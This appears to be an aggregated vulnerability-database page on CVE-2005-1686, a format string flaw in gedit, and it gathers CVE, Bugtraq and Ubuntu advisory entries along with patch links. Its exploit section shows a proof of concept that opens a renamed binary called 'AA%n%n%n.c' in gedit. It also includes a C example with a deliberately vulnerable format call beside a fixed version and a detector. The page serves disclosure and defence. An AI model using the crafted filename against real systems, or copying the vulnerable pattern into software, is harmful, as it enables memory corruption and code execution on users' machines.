CVE-2005-1686
CVSS 2.6
Published: 2005-05-20 00:00:00
Revised: 2016-10-17 23:21:43

[Original text] Format string vulnerability in gedit 2.10.2 may allow attackers to cause a denial of service (application crash) via a bin file with format string specifiers in the filename. NOTE: while this issue is triggered on the command line by the gedit user, it has been reported that web browsers and email clients could be configured to provide a file name as an argument to gedit, so there is a valid attack that crosses security boundaries.


[CNNVD] gEdit filename format string handling vulnerability (CNNVD-200505-1136)

        gedit is the official text editor of the GNOME desktop environment.
        gEdit contains a format string vulnerability. An attacker may exploit it to corrupt arbitrary memory, leading to arbitrary code execution with the privileges of the user running the program.

- CVSS (base score)

CVSS score: 2.6 [LOW]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Access complexity: [--]
Access vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

oval:org.mitre.oval:def:9845  Format string vulnerability in gedit 2.10.2 may allow attackers to cause a denial of service (application crash) via a bin file with format ...
oval:org.mitre.oval:def:1245  gedit Format String Vulnerability
*OVAL describes in detail how to detect this vulnerability; see the related OVAL definitions for more technical details on detection.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1686
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1686
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-1136
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=111661117701398&w=2
(UNKNOWN)  BUGTRAQ  20050520 pst.advisory: gedit fun. opensource is god .lol windows
http://security.gentoo.org/glsa/glsa-200506-09.xml
(UNKNOWN)  GENTOO  GLSA-200506-09
http://www.debian.org/security/2005/dsa-753
(UNKNOWN)  DEBIAN  DSA-753
http://www.novell.com/linux/security/advisories/2005_36_sudo.html
(UNKNOWN)  SUSE  SUSE-SA:2005:036
http://www.redhat.com/support/errata/RHSA-2005-499.html
(UNKNOWN)  REDHAT  RHSA-2005:499
http://www.ubuntulinux.org/support/documentation/usn/usn-138-1
(UNKNOWN)  UBUNTU  USN-138-1

- Vulnerability information

gEdit filename format string handling vulnerability
Low severity  Format string
2005-05-20 00:00:00 2005-10-20 00:00:00
Remote
        gedit is the official text editor of the GNOME desktop environment.
        gEdit contains a format string vulnerability. An attacker may exploit it to corrupt arbitrary memory, leading to arbitrary code execution with the privileges of the user running the program.

- Advisories and patches

        At the time this entry was written the vendor had not released a patch or upgrade; users of this software should watch the vendor's homepage for the latest version:
        http://www.gnome.org/
        Distribution updates for this issue (USN-138-1, DSA-753, RHSA-2005:499, GLSA-200506-09, SUSE-SA:2005:036) are listed under the links above.

- Vulnerability information (F38144)

Ubuntu Security Notice 138-1 (PacketStormID:F38144)
2005-06-21 00:00:00
Ubuntu  ubuntu.com
advisory,overflow,arbitrary
linux,ubuntu
CVE-2005-1686

Ubuntu Security Notice USN-138-1 - A format string vulnerability has been discovered in gedit. Calling the program with specially crafted file names caused a buffer overflow, which could be exploited to execute arbitrary code with the privileges of the gedit user.

===========================================================
Ubuntu Security Notice USN-138-1	      June 09, 2005
gedit vulnerability
CAN-2005-1686
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)
Ubuntu 5.04 (Hoary Hedgehog)

The following packages are affected:

gedit

The problem can be corrected by upgrading the affected package to
version 2.8.1-0ubuntu1.1 (for Ubuntu 4.10) and 2.10.2-0ubuntu2 (for
Ubuntu 5.04).  In general, a standard system upgrade is sufficient to
effect the necessary changes.

Details follow:

A format string vulnerability has been discovered in gedit. Calling
the program with specially crafted file names caused a buffer
overflow, which could be exploited to execute arbitrary code with the
privileges of the gedit user.

This becomes security relevant if e. g. your web browser is configured
to open URLs in gedit. If you never open untrusted file names or URLs
in gedit, this flaw does not affect you.


Updated packages for Ubuntu 4.10 (Warty Warthog):

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/g/gedit/gedit_2.8.1-0ubuntu1.1.diff.gz
      Size/MD5:     9414 605064f69529dfef55e811a14c482c44
    http://security.ubuntu.com/ubuntu/pool/main/g/gedit/gedit_2.8.1-0ubuntu1.1.dsc
      Size/MD5:     1751 ef7f5d4ec7adf77d7fe0eca3df751456
    http://security.ubuntu.com/ubuntu/pool/main/g/gedit/gedit_2.8.1.orig.tar.gz
      Size/MD5:  4082500 38447bcce215ddc90205e60deee1f49a

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/g/gedit/gedit-common_2.8.1-0ubuntu1.1_all.deb
      Size/MD5:  1814036 1d7f5fc1152f90b902830602d7a1ae20

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/g/gedit/gedit_2.8.1-0ubuntu1.1_amd64.deb
      Size/MD5:   501052 a58ebb5a3914c37a1f3cc7a339a3eecc

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/g/gedit/gedit_2.8.1-0ubuntu1.1_i386.deb
      Size/MD5:   464902 7e5dc6f7a66976b530b0891c22a52a22

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/g/gedit/gedit_2.8.1-0ubuntu1.1_powerpc.deb
      Size/MD5:   478494 b7b389f80fa6c37871d782e9bc368156

Updated packages for Ubuntu 5.04 (Hoary Hedgehog):

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/g/gedit/gedit_2.10.2-0ubuntu2.diff.gz
      Size/MD5:    51287 b163e88c7caf983d1f863533c0d10e54
    http://security.ubuntu.com/ubuntu/pool/main/g/gedit/gedit_2.10.2-0ubuntu2.dsc
      Size/MD5:     1862 ae8f61880a855ec21f9419b8dcd513b5
    http://security.ubuntu.com/ubuntu/pool/main/g/gedit/gedit_2.10.2.orig.tar.gz
      Size/MD5:  5148694 9469c2605ff2bcff589312bc0227a79d

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/g/gedit/gedit-common_2.10.2-0ubuntu2_all.deb
      Size/MD5:   834914 56aa2aee8546e88d451c432378d6ef07
    http://security.ubuntu.com/ubuntu/pool/universe/g/gedit/gedit-dev_2.10.2-0ubuntu2_all.deb
      Size/MD5:    41476 db0cb15d872dd629174d383c93aa8af5

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/g/gedit/gedit_2.10.2-0ubuntu2_amd64.deb
      Size/MD5:   494800 e0479c5e0e71065b7f38efcd715c4c0b

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/g/gedit/gedit_2.10.2-0ubuntu2_i386.deb
      Size/MD5:   463338 3aa98938e1a77e3c047d1f45eb895776

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/g/gedit/gedit_2.10.2-0ubuntu2_powerpc.deb
      Size/MD5:   478466 3fd8cc7bcc5145dcd8d4c44a1885ffd1

    

- Vulnerability information

16809
GNOME gedit Filename Format String DoS
Local Access Required, Context Dependent Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability
Exploit Public

- Vulnerability description

gedit contains a flaw that may allow a local denial of service. The issue is triggered due to the handling of binary files with format string specifiers in the filename. With a specially crafted filename, a malicious user can cause the application to crash resulting in a loss of availability.

- Timeline

2005-05-20 Unknown
2005-05-20 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue. (OSVDB entry text as published; the distribution advisories listed above, such as USN-138-1 and DSA-753, do provide fixed packages.)

- References

- Credit

- Vulnerability information

Gedit Filename Format String Vulnerability
Class: Input Validation Error  Bugtraq ID: 13699
Remote: Yes  Local: No
Published: 2005-05-30 12:00:00  Updated: 2011-04-19 08:54:00
Discovery of this issue is credited to jsk:exworm (www.0xbadexworm.org).

- Affected program versions

Turbolinux Turbolinux Desktop 10.0
Turbolinux Turbolinux 10 F...
Turbolinux Home
Sun Solaris 10_x86
Sun Solaris 10_sparc
SGI ProPack 3.0
SGI Advanced Linux Environment 3.0
RedHat Enterprise Linux WS 4
RedHat Enterprise Linux WS 3
RedHat Enterprise Linux ES 4
RedHat Enterprise Linux ES 3
RedHat Enterprise Linux AS 4
RedHat Enterprise Linux AS 3
RedHat Enterprise Linux Desktop version 4
RedHat Desktop 4.0
RedHat Desktop 3.0
MandrakeSoft Linux Mandrake 10.2 x86_64
MandrakeSoft Linux Mandrake 10.2
MandrakeSoft Linux Mandrake 10.1 x86_64
MandrakeSoft Linux Mandrake 10.1
MandrakeSoft Corporate Server 3.0 x86_64
MandrakeSoft Corporate Server 3.0
ImageMagick ImageMagick 5.4.3
+ Turbolinux Turbolinux Workstation 8.0
GNOME gEdit 2.10.2
+ Ubuntu Ubuntu Linux 5.0 4 powerpc
+ Ubuntu Ubuntu Linux 5.0 4 i386
+ Ubuntu Ubuntu Linux 5.0 4 amd64
GNOME gEdit 2.8.3
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 amd64
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
GNOME gEdit 2.8.1
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
GNOME gEdit 2.2.0
GNOME gEdit 2.0.2

- Vulnerability discussion

gEdit is prone to a format-string vulnerability. Exploitation may occur when the program is invoked with a filename that includes malicious format specifiers.

Attackers could exploit this issue to corrupt arbitrary regions of memory with attacker-supplied data, potentially resulting in the execution of arbitrary code in the context of the user running the program.

- Exploit

The following example is available. Any compiled binary serves as the "bin file": the flaw is triggered when gedit handles a non-text file whose name carries format specifiers, so the binary is simply renamed to a name containing %n.

bash-2.05b# cat fmtexp.c

#include <stdio.h>

/* The program's behaviour is irrelevant; it only needs to be a non-text
 * file so that gedit treats it as binary when opened. */
int
main(void)
{
    printf("hah gedit\n");
    return 0;
}

bash-2.05b# gcc -o fk fmtexp.c

bash-2.05b# mv fk AA%n%n%n.c

bash-2.05b# gedit AA%n%n%n.c
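The mechanism behind the discussion and the proof of concept above, as an added example that is not gedit's source or the page's own code: a printf-style warning helper (show_warning, an assumed name modelled on a GUI "show dialog" call) is handed a message that already contains the filename, so any '%' sequences in the name are parsed as conversions; the fixed variant passes the filename only as a %s argument to a literal format. The stand-alone demo substitutes %x for the PoC's %n so it leaks stack words instead of writing memory. contains_format_specifier is an assumed helper showing the check a launcher can apply to an untrusted name.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Added example, not gedit's code. show_warning/build_open_error_* are
 * assumed names standing in for a printf-style dialog function. */

/* printf-style warning helper: whatever arrives as fmt is parsed for
 * conversion specifiers. The result goes to out so it can be inspected. */
static void show_warning(char *out, size_t n, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(out, n, fmt, ap);
    va_end(ap);
}

/* VULNERABLE: the message is built with the filename first and then passed
 * as the format string. "AA%n%n%n.c" makes vsnprintf read arguments that
 * were never supplied (%x/%p leak stack words) and, with %n, write the
 * number of bytes emitted so far to an attacker-influenced address. */
static void build_open_error_unsafe(char *out, size_t n, const char *filename)
{
    char msg[512];
    snprintf(msg, sizeof msg,
             "Could not open the file \"%s\" because it is not a text file.",
             filename);
    show_warning(out, n, msg);          /* BUG: attacker-controlled format */
}

/* FIXED: the format is a compile-time literal and the filename is consumed
 * only by the %s conversion, so '%' inside the name is inert data. */
static void build_open_error_safe(char *out, size_t n, const char *filename)
{
    show_warning(out, n,
                 "Could not open the file \"%s\" because it is not a text file.",
                 filename);
}

/* Boundary check: does an untrusted name contain a '%' that a format
 * function would interpret? "%%" is a literal percent and is not flagged. */
static int contains_format_specifier(const char *s)
{
    for (const char *p = strchr(s, '%'); p; p = strchr(p + 1, '%')) {
        if (p[1] == '%') { p++; continue; }
        return 1;
    }
    return 0;
}

int main(void)
{
    char out[512];
    const char *pct  = "sales 100%%.txt";  /* constructed: a name with "%%" */
    const char *leak = "AA%x%x%x.c";       /* constructed: PoC name, %x for %n */

    build_open_error_unsafe(out, sizeof out, pct);  puts(out); /* "%%" collapses to "%" */
    build_open_error_safe(out, sizeof out, pct);    puts(out); /* name kept verbatim */
    build_open_error_unsafe(out, sizeof out, leak); puts(out); /* prints leaked stack words */
    build_open_error_safe(out, sizeof out, leak);   puts(out);
    printf("flag %s: %d\n", leak, contains_format_specifier(leak));
    return 0;
}
```

gcc's -Wformat-security does not warn at the unsafe call because show_warning is not declared as a printf-like function; adding `__attribute__((format(printf, 3, 4)))` to its prototype makes the compiler flag the non-literal format with no arguments, which is the cheapest way to find this pattern in a code base.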

- Solution

Ubuntu has released an advisory (USN-138-1) and fixes to address this issue. Please see the referenced advisory for information on obtaining and applying appropriate fixes.


Turbolinux Home

Turbolinux Turbolinux Desktop 10.0

MandrakeSoft Linux Mandrake 10.1

MandrakeSoft Linux Mandrake 10.1 x86_64

MandrakeSoft Linux Mandrake 10.2 x86_64

MandrakeSoft Linux Mandrake 10.2

GNOME gEdit 2.10.2

GNOME gEdit 2.8.1

GNOME gEdit 2.8.3

MandrakeSoft Corporate Server 3.0 x86_64

MandrakeSoft Corporate Server 3.0

- References